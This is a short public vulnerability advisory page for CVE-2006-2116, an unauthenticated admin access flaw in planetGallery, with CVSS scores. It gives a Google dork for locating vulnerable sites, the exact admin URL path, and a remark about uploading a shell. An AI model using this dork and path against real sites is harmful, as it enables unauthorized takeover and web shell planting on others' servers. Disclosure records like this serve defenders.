Bug: planetGallery admin login ( Ascii Version )

Search:
WLB2

planetGallery admin login

Published
Credit
Risk
2006.05.03
tugr@,AlpEren
Medium
CWE
CVE
Local
Remote
N/A
CVE-2006-2116
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

google dork - inurl:planetgallery

last path add to /admin/gallery_admin.php

example:

http://site.com/planetgallery/admin/gallery_admin.php

no pass, no login, sending your shell.

credits:tugr@,AlpEren

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version